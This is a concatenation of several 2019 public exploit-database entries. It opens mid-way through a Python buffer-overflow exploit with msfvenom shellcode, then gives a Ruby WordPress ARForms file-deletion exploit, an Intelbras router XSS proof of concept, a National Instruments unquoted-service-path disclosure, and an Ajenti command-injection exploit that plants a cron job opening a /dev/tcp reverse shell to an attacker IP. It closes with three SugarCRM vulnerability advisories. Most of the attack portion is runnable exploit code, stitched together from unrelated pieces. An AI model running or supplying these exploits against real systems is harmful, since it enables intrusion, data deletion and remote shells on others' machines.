"\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81"
"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1"
"\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1"
"\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
"\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -f python -v shellcode -b "\x00\x0d" BufferRegister=ESP
shellcode =  b""
shellcode += b"\xbb\x6d\x07\x8f\xfd\x89\xe6\x31\xc9\xb1\x31"
shellcode += b"\x31\x5e\x13\x83\xc6\x04\x03\x5e\x62\xe5\x7a"
shellcode += b"\x01\x94\x6b\x84\xfa\x64\x0c\x0c\x1f\x55\x0c"
shellcode += b"\x6a\x6b\xc5\xbc\xf8\x39\xe9\x37\xac\xa9\x7a"
shellcode += b"\x35\x79\xdd\xcb\xf0\x5f\xd0\xcc\xa9\x9c\x73"
shellcode += b"\x4e\xb0\xf0\x53\x6f\x7b\x05\x95\xa8\x66\xe4"
shellcode += b"\xc7\x61\xec\x5b\xf8\x06\xb8\x67\x73\x54\x2c"
shellcode += b"\xe0\x60\x2c\x4f\xc1\x36\x27\x16\xc1\xb9\xe4"
shellcode += b"\x22\x48\xa2\xe9\x0f\x02\x59\xd9\xe4\x95\x8b"
shellcode += b"\x10\x04\x39\xf2\x9d\xf7\x43\x32\x19\xe8\x31"
shellcode += b"\x4a\x5a\x95\x41\x89\x21\x41\xc7\x0a\x81\x02"
shellcode += b"\x7f\xf7\x30\xc6\xe6\x7c\x3e\xa3\x6d\xda\x22"
shellcode += b"\x32\xa1\x50\x5e\xbf\x44\xb7\xd7\xfb\x62\x13"
shellcode += b"\xbc\x58\x0a\x02\x18\x0e\x33\x54\xc3\xef\x91"
shellcode += b"\x1e\xe9\xe4\xab\x7c\x67\xfa\x3e\xfb\xc5\xfc"
shellcode += b"\x40\x04\x79\x95\x71\x8f\x16\xe2\x8d\x5a\x53"
shellcode += b"\x1c\xc4\xc7\xf5\xb5\x81\x9d\x44\xd8\x31\x48"
shellcode += b"\x8a\xe5\xb1\x79\x72\x12\xa9\x0b\x77\x5e\x6d"
shellcode += b"\xe7\x05\xcf\x18\x07\xba\xf0\x08\x64\x5d\x63"
shellcode += b"\xd0\x45\xf8\x03\x73\x9a"

#0x76f401cb : jmp esp |  {PAGE_EXECUTE_READ} [DNSAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6089 (C:\WINDOWS\system32\DNSAPI.dll)
jmp = "\xcb\x01\xf4\x76"

#payload = pattern
payload = "A" * 1783
payload += jmp
#payload += badchars
payload += shellcode 
payload += "C" * (5000 - len(payload))

try:
  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  print "Sending exploit..."
  s.connect((host,port))
  s.send("CONNECT " + payload +  "\r\n\r\n")
  s.close()
except:
  print "Connection error"

# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal 
# Date: 2019-09-27
# Exploit Author: Ahmad Almorabea
# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt 
# Software Link: https://www.arformsplugin.com/documentation/changelog/
# Version: 3.7.1
# CVE ID: CVE-2019-16902

#**************Start Notes**************
# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
# But maybe in other forms maybe it's different so you have to change it accordingly.
# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on 
# There is a request file with this Script make sure to put it in the same folder.
#**************End Notes****************

#!/usr/bin/env ruby

require "net/http"
require 'colorize'

$host       = ARGV[0] || ""
$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"


def start_function ()

  puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
  name = STDIN.gets

  if $host == ""
      puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
      exit
  end


  check_existence_arform_folder
  execute_deletion_attack

  puts "Done ... see ya  " + name 

end


def send_checks(files_names)




  j = 1
  while j <= files_names.length-1

      uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
      http = Net::HTTP.new(uri.host, uri.port)
      http.use_ssl = true if uri.scheme == 'https'    # Enable HTTPS support if it's HTTPS

      request = Net::HTTP::Get.new(uri.request_uri)
      request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
      request["Connection"] = "keep-alive"
      request["Accept-Language"] = "en-US,en;q=0.5"
      request["Accept-Encoding"] = "gzip, deflate"
      request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"


      begin

        response = http.request(request).code
        puts "The File " + files_names[j] + " has the response code of " + response
      rescue Exception => e
        puts "[!] Failed!"
        puts e
      end
      j = j+1 
  end
end


def check_existence_arform_folder ()



  path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
  $i = 0 
  results = []

  while $i <= path_array.length-1  

    uri = URI.parse("http://#{$host}/#{path_array[$i]}")
    #puts uri
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == 'https'    # Enable HTTPS support if it's HTTPS
    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)
    results[$i] = response.code
    #puts"response code is : " + response.code

    $i +=1

  end

  puts "****************************************************"

  if results[0] == "200" || results[0] =="301"

    puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
  else
    puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
    exit
  end

  if (results[1] == "200" || results[1] == "301")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

      puts "The User Files  folder is  Available on the following path : ".green + $host + path_array[1]
  else

     puts "We couldn't find the User Files folder, on the following path ".red +  $host + path_array[1]

  end
  puts "****************************************************"



end


def execute_deletion_attack ()



    puts "How many file you want to delete my man"
    amount = STDIN.gets.chomp.to_i

    if(amount == 0)
      puts "You can't use 0 or  other strings this input for the amount of file you want to delete so it's an Integer".blue
      exit
    end

    file_names = []
    file_names[0] = "143_772_1569713145702_temp3.txt"
    j = 1
   while j <= amount.to_i
      puts "Name of the file number " + j.to_s 
      file_names[j] = STDIN.gets
      file_names[j].strip!
      j = j+1
    end


    uri = URI.parse("http://#{$host}")
    #puts uri
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == 'https'
    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)
    global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie




    $i = 0
    while $i <= file_names.length-1 

    puts "Starting the Attack Journey .. ".green 

      uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
      headers =
      {
'Referer'         => 'From The Sky',
'User-Agent'      => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Content-Type'    => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
'Accept-Encoding' => 'gzip, deflate',
'Cookie'          => global_cookie,
'X_FILENAME'      => file_names[$i],
'X-FILENAME'      => file_names[$i],
'Connection'      => 'close'

       }

      http    = Net::HTTP.new(uri.host, uri.port)
      http.use_ssl = true if uri.scheme == 'https'
      request = Net::HTTP::Post.new(uri.path, headers)
      request.body = File.read("post_file")
      response = http.request request

      $i = $i +1     
  end

    execute_delete_request file_names,global_cookie,amount.to_i

    puts "Finished.........."

end

def execute_delete_request (file_names,cookies,rounds )


    $i = 0

    while $i <= file_names.length-1   

    puts "Starting the Attack on file No #{$i.to_s} ".green  

        uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
        headers =
        {
'Referer'         => 'From The Sky',
'User-Agent'      => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept'          => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'X-Requested-With'=> 'XMLHttpRequest',
'Cookie'          =>  cookies,
'Content-Type'    => 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding' => 'gzip, deflate',
'Connection'      => 'close'
        }

        http    = Net::HTTP.new(uri.host, uri.port)
        http.use_ssl = true if uri.scheme == 'https'
        request = Net::HTTP::Post.new(uri.path,headers)
        request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
        response = http.request(request)

        if $i != 0
          puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
        end
         $i = $i +1 

    end

    send_checks file_names

end


start_function()

# Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting
# Date: 2019-10-03
# Exploit Author: Prof. Joas Antonio
# Vendor Homepage: https://www.intelbras.com/pt-br/
# Software Link: http://en.intelbras.com.br/node/25896
# Version: 1.0.18
# Tested on: Windows
# CVE : CVE-2019–17411

# PoC 1:

1) Login to your router

2) After signing in as WAN Settings

3) Select for PPPOE mode

4) In the Service Name and Server Name field, enter any of these payloads:

<script> alert ("Hacked") </script>

<script> alert (1) </script>

# PoC burp.txt

POST /goform/AdvSetWan HTTP/1.1
Host: TARGET
Content-Length: 281
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://TARGET/wan_connected.asp
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt
Connection: close

# Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
# Discovery Date: 2019-10-10
# Exploit Author: Ivan Marmolejo
# Vendor Homepage: http://www.ni.com/en-us.html
# Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite
# Version: 14.0
# Vulnerability Type: Local
# Tested on: Windows 10 Pro x64 Esp
# Version: 10.0.18362

# Exploit.txt

##############################################################################################################################################

Summary:        Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design,simulation, 
validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive 
SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers
advanced simulation capabilities to give you a clear view of how circuits perform in any situation.

Description:    The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an 
authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
of the application.


##############################################################################################################################################

Step to discover the unquoted Service:


C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """


NI Service Locator           NiSvcLoc              C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s            Auto


##############################################################################################################################################

Service info:


C:\Users\user>sc qc NiSvcLoc

[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: NiSvcLoc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : NI Service Locator
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

##############################################################################################################################################

#!/usr/bin/python
# ajentix.py
# 
# Ajenti Remote Command Execution Exploit
#
# Jeremy Brown [jbrown3264/gmail] @ Oct 2019
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS. 
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
#   PID TTY          TIME CMD
#  6386 ?        00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ?        00:00:00 sh
# 18851 ?        00:00:00 bash
# 18859 ?        00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
# 
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#

import os
import sys
import ssl
import json
import urllib.request as request

def main():
  if(len(sys.argv) < 2):
    print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
    print("Eg:    %s 1.2.3.4 \"id\"" % sys.argv[0])
    print("...    %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
    return

  host = sys.argv[1]
  opt = sys.argv[2]

  if(opt == 'shell'):
    if(len(sys.argv) < 4):
      print("Error: need another arg for shell")
      return

    ip = sys.argv[3]

    shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\"> /tmp/cronx; crontab /tmp/cronx`"

    body = json.dumps({'username':shell, 'password':'test', 'mode':'normal'})
    byte = body.encode('utf-8')

    url = "https://" + host + ":8000" + "/api/core/auth"

    try:
      req = request.Request(url)

      req.add_header('Content-Type', 'application/json; charset=utf-8')
      req.add_header('Content-Length', len(byte))

      request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert

    except Exception as error:
      print("Error: %s" % error)
      return

    print("Done!")


if(__name__ == '__main__'):
  main()

-------------------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Reflected Cross-Site Scripting 
Vulnerabilities
-------------------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed through the "form" parameter when handling the 
"Popup"
action within the "DataSets" module is not properly sanitized before 
being
used to generate HTML output. This can be exploited by malicious users 
to
carry out Reflected Cross-Site Scripting (XSS) attacks.

2) User input passed through the "name" parameter when handling the 
"Popup"
action within the "DataSets" module is not properly sanitized before 
being
used to generate HTML output. This can be exploited by malicious users 
to
carry out Reflected Cross-Site Scripting (XSS) attacks.

3) User input passed through the "type" parameter when handling the 
"dupcheck"
action within the "Import" module is not properly sanitized before being 
used
to generate HTML output. This can be exploited by malicious users to 
carry
out Reflected Cross-Site Scripting (XSS) attacks.

4) User input passed through the "message" parameter when handling the 
"error"
action within the "Import" module is not properly sanitized before being 
used
to generate HTML output. This can be exploited by malicious users to 
carry
out Reflected Cross-Site Scripting (XSS) attacks.

5) User input passed through the "direct_step" parameter when handling 
the
"WizardNewsletter" action within the "Campaigns" module is not properly
sanitized before being used to generate HTML output. This can be 
exploited
by malicious users to carry out Reflected Cross-Site Scripting (XSS) 
attacks.

6) User input passed through the "iframe_type" parameter when handling 
the
"IframeDropdown" action within the "WorkFlow" module is not properly
sanitized before being used to generate HTML output. This can be 
exploited
by malicious users to carry out Reflected Cross-Site Scripting (XSS) 
attacks.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-03


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes

--------------------------------------------------------
SugarCRM <= 9.0.1 Multiple SQL Injection Vulnerabilities
--------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed to the "/pmse_Inbox/changeCaseUser" REST API 
endpoint
is not properly sanitized before being used to construct a SQL query.
This can be exploited by malicious users to e.g. read sensitive data
from the database through in-band SQL Injection attacks.

2) User input passed to the "/pmse_Project/CrmData/activities" REST API 
endpoint
is not properly sanitized before being used to construct a SQL query. 
This can
be exploited by malicious users to e.g. read sensitive data from the 
database
through in-band SQL Injection attacks.

3) User input passed to the "/pmse_Project/CrmData/emails" REST API 
endpoint is
not properly sanitized before being used to construct a SQL query. This 
can be
exploited by malicious users to e.g. read sensitive data from the 
database
through in-band SQL Injection attacks.

4) User input passed to the "/pmse_Project/CrmData/emailtemplates" REST 
API
endpoint is not properly sanitized before being used to construct a SQL 
query.
This can be exploited by malicious users to e.g. read sensitive data 
from the
database through in-band SQL Injection attacks.

5) User input passed to the "/pmse_Project/CrmData/users" REST API 
endpoint is
not properly sanitized before being used to construct a SQL query. This 
can be
exploited by malicious users to e.g. read sensitive data from the 
database
through in-band SQL Injection attacks.

6) User input passed through the "pro_module" JSON parameter to the
"/pmse_Project/CrmData/putData" REST API endpoint is not properly 
sanitized
before being used to construct a SQL query. This can be exploited by 
malicious
users to e.g. read sensitive data from the database through time-based
Blind SQL Injection attacks.

7) User input passed through the "cas_id" and "cas_index" parameters to 
the
"/pmse_Project/CrmData/validateReclaimCase" REST API endpoint is not 
properly
sanitized before being used to construct a SQL query. This can be 
exploited by
malicious users to e.g. read sensitive data from the database through
time-based Blind SQL Injection attacks.

8) The vulnerability exists because the "/modules/Emails/Grab.php"
script is
using the "group_id" field of an "InboundEmail" bean to construct a SQL 
query
without being properly sanitized, and such value can be arbitrarily 
manipulated
through the MergeRecords module. This can be exploited by malicious 
users to
e.g. read sensitive data from the database through boolean-based 
second-order
SQL Injection attacks.

9) The vulnerability exists because the "/[module]/export" REST API 
endpoint is
using a value that can be arbitrarily manipulated through the 
"/[module]/record_list"
endpoint to construct a SQL query without being properly sanitized. This 
can be
exploited by malicious users to e.g. read sensitive data from the 
database
through in-band second-order SQL Injection attacks.

10) User input passed through the "order_by" parameter to the 
"/link/history" REST
API endpoint is not properly sanitized before being used to construct a 
SQL query.
This can be exploited by malicious users to e.g. read sensitive data 
from the
database through time-based Blind SQL Injection attacks.

11) The vulnerability exists because the 
"PersonFormBase::checkForDuplicates()"
method is using certain POST parameters to construct a SQL query without 
being
properly sanitized. This can be exploited by malicious users to e.g. 
read sensitive
data from the database through time-based SQL Injection attacks.

12) User input passed through the "act_name" JSON parameter to the 
"/pmse_Inbox"
REST API endpoint is not properly sanitized before being used to 
construct a SQL
query. This can be exploited by malicious users to e.g. read sensitive 
data from
the database through time-based Blind SQL Injection attacks.

13) User input passed to the "/pmse_Inbox/processUsersChart" REST API 
endpoint is
not properly sanitized before being used to construct a SQL query. This 
can be
exploited by malicious users to e.g. read sensitive data from the 
database through
in-band SQL Injection attacks. Successful exploitation of this 
vulnerability
requires an user account with Admin/Developer access to the "Processes"
module.

14) User input passed through the "deal_tot_discount_percentage" JSON 
parameter to
the "/Quotes" REST API endpoint is not properly sanitized before being 
used to
construct a SQL query. This can be exploited by malicious users to e.g. 
read
sensitive data from the database through time-based Blind SQL Injection 
attacks.

15) User input passed through the "q" parameter to the 
"/pmse_Inbox/unattendedCases"
REST API endpoint is not properly sanitized before being used to 
construct a SQL
query. This can be exploited by malicious users to e.g. read sensitive 
data from
the database through in-band SQL Injection attacks. Successful 
exploitation of
this vulnerability requires an user account with Admin/Developer access 
to
the "Processes" module.

16) User input passed to the "/pmse_Inbox/userListByTeam" REST API 
endpoint is not
properly sanitized before being used to construct a SQL query. This can 
be exploited
by malicious users to e.g. read sensitive data from the database through
in-band SQL Injection attacks.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-04


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes

----------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Broken Access Control Vulnerabilities
----------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) There is a Broken Access Control vulnerability with regards to the 
"InboundEmail" module.
When handling the "Save" action the application fails to properly check 
whether the user has
Admin access to the module, thus allowing any user to create a new 
"InboundEmail" bean
regardless of their roles/permissions.

2) There is a Broken Access Control vulnerability with regards to the 
"Trackers" module.
When handling the "trackersettings" action the application fails to 
properly check whether
the user has Admin access to the module, thus allowing any user to 
change Trackers'
settings regardless of their roles/permissions

3) There is a Broken Access Control vulnerability with regards to the 
"Campaigns" module.
When handling the "WizardEmailSetupSave" action the application fails to 
properly check
whether the user has Admin access to the module, thus allowing any user 
to change Email
Setup for Campaigns regardless of their roles/permissions.

4) There is a Broken Access Control vulnerability with regards to the 
"ModuleBuilder" module.
When the "view_module" parameter is set to an empty string, the 
application fails to properly
check whether the user has permissions to access the module, thus 
allowing any user to access
certain ModuleBuilder actions regardless of their roles.

5) There is a Broken Access Control vulnerability with regards to the 
"Administration"
module. When handling the "SaveMerge" action within the "MergeRecords"
module the application
fails to properly check whether the user is a System Administrator, thus 
allowing unauthorized
users to inject arbitrary "Administration" beans (which means arbitrary 
values into the
"config" database table). Successful exploitation of this vulnerability 
requires an user
account with Developer access to any module.

6) There is a Broken Access Control vulnerability with regards to the 
"Administration" module.
When handling the "Save" action within the "EmailMan" module the 
application allows unauthorized
users to modify administration settings by invoking the 
"Administration::saveConfig()" method.
Successful exploitation of this vulnerability requires an user account 
with Developer access
to the Emails or Campaigns modules.

7) There is a Broken Access Control vulnerability with regards to the 
"Administration" module.
When handling the "WizardEmailSetupSave" action within the "Campaigns"
module the application
allows unauthorized users to modify administration settings by invoking 
the
"Administration::saveConfig()" method.

8) There is a Local File Inclusion vulnerability within the 
"add_to_prospect_list" function.
User input passed through the "parent_module" and "parent_type"
parameters is not properly
sanitized before being used in a call to the include() function. This 
can be exploited to
include arbitrary .php files within the webroot and potentially bypass 
authorization mechanisms
(for instance, by setting the "parent_module" parameter to 
"Administration" and the "parent_type"
parameter to "expandDatabase" or any other action which does not 
implement ACL checks).


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-05


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes